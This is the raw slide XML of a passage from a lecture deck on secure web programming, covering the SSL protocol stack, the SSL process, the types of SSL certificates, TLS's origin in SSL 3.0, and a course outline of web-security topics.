            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1276349" y="5150221"/>
            <a:ext cx="2841625" cy="603250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFF00">
                  <a:gamma/>
                  <a:shade val="46275"/>
                  <a:invGamma/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FFFF00"/>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b="1">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU" altLang="ko-KR" sz="1400" b="1">
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1276349" y="5863009"/>
            <a:ext cx="2841625" cy="601662"/>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TCP/IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2259011" y="4439021"/>
            <a:ext cx="874713"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IMAP </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3243261" y="4439021"/>
            <a:ext cx="874713" cy="601663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="18605A">
                  <a:gamma/>
                  <a:shade val="46275"/>
                  <a:invGamma/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="18605A"/>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763" tIns="34381" rIns="68763" bIns="34381" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="687388" eaLnBrk="0" latinLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" altLang="ko-KR" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LDAP </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624156EB-439B-444F-8523-A1C2BCC89819}"/>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124534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818148"/>
            <a:ext cx="8110249" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSL Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="284163" y="1946468"/>
            <a:ext cx="8574087" cy="4387673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3993444" y="6548710"/>
            <a:ext cx="4864806" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0" err="1"/>
              <a:t>www.awardspace.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0" err="1"/>
              <a:t>ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0"/>
              <a:t>-certificates/what-is-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0" err="1"/>
              <a:t>ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0"/>
              <a:t>-certificate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93453A31-8E18-1843-ADD9-C5DE027839F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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102127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FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of SSL Certificates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864381" y="2307771"/>
            <a:ext cx="7691789" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" dirty="0"/>
              <a:t>client certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>used to identify a client to an SSL server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>typically the client would be a person</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>a bank might issue a client certificate to a customer to provide secure account access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>a business might issue a client certificate to an employee to identify that employee to the businesses servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" dirty="0"/>
              <a:t>server certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>identify a server to a client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>required when encryption is used between the client and the server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5714D799-DEBD-4E4E-9934-907103C5EF56}"/>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44354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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2862826" y="2155674"/>
            <a:ext cx="3435785" cy="4421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Secure Web Programming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450758" y="3182731"/>
            <a:ext cx="2540148" cy="3488910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="66006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6221624" y="3182730"/>
            <a:ext cx="2636626" cy="3488911"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3310645" y="3182731"/>
            <a:ext cx="2540148" cy="348891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a:stCxn id="4" idx="1"/>
            <a:endCxn id="5" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1720832" y="2376773"/>
            <a:ext cx="1141994" cy="80595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2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4580719" y="2597871"/>
            <a:ext cx="0" cy="584860"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="3C8C9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3"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6298611" y="2376773"/>
            <a:ext cx="1241326" cy="80595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38750"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300" dirty="0"/>
              <a:t>HTTP Protocols, Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3438750" y="4387352"/>
            <a:ext cx="2267427" cy="665290"/>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Security Issues and Technologies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3438750" y="5209100"/>
            <a:ext cx="2267427" cy="6093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Secure Programming and Users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6374024" y="4425452"/>
            <a:ext cx="2267427" cy="581056"/>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400" dirty="0"/>
              <a:t>Session management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6359863"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Advanced Web Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6374024" y="5209100"/>
            <a:ext cx="2267427" cy="7032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Common Gateway Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6359863" y="6051823"/>
            <a:ext cx="2281588" cy="4698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  Advanced Security Issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7652138" y="2333400"/>
            <a:ext cx="975152" cy="419245"/>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1200" dirty="0"/>
              <a:t>Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7737491" y="2201877"/>
            <a:ext cx="889799" cy="276999"/>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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Week13</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7533745" y="2062625"/>
            <a:ext cx="1228027" cy="803613"/>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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603159" y="3680059"/>
            <a:ext cx="2261248"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300" dirty="0"/>
              <a:t>Fundamentals – protocol, CS model, etc. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603158" y="4312842"/>
            <a:ext cx="2267427" cy="66969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Human</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Computer Interaction with Web Page Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603158" y="5103412"/>
            <a:ext cx="2267427" cy="7004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Client-side Scripting Language and Document Object Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603158" y="5912322"/>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Server-side Scripting Language and Privilege configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603158" y="3272325"/>
            <a:ext cx="2261249" cy="292388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="660066"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Basic Web Programming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475360" y="3279862"/>
            <a:ext cx="2231271" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6300192" y="3272326"/>
            <a:ext cx="2461580" cy="292388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="20E45C"/>
          </a:solidFill>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="008000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Adv. Web Programming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3438749" y="5912323"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encryption and Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{499F3C7D-577B-D740-BA03-2EF0B5367E0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7678616" y="295730"/>
            <a:ext cx="791308" cy="767687"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5FD889E0-CAB2-4699-909D-B9A88D47ACBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13107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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="accent2"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="2000" fill="hold"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="accent2"/>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FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of SSL Certificates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864381" y="2489200"/>
            <a:ext cx="7550275" cy="3530600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" dirty="0"/>
              <a:t>object-signing certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>used to identify the signer of java applets, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0" err="1"/>
              <a:t>javascripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>, and other executable code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" dirty="0"/>
              <a:t>CA certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>used to certificate authorities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>stored in the browser, and determine what other certificates the browser can authenticate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B62F949-6CAE-A041-B0EC-1374EE3F813A}"/>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182852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TLS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>Transport Layer Security)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864382" y="2231571"/>
            <a:ext cx="7833304" cy="4212771"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>Transport Layer Security protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>based on the SSL 3.0 specification from Netscape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>The same record format as the SSL record format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>TLS Protocol version 1.2 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>defined in RFC 5246.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>It can be considered as an SSLv3.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>TLS is incompatible with SSL, but TLS applications will usually "fall back" to an SSL implementation if the other end cannot speak TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
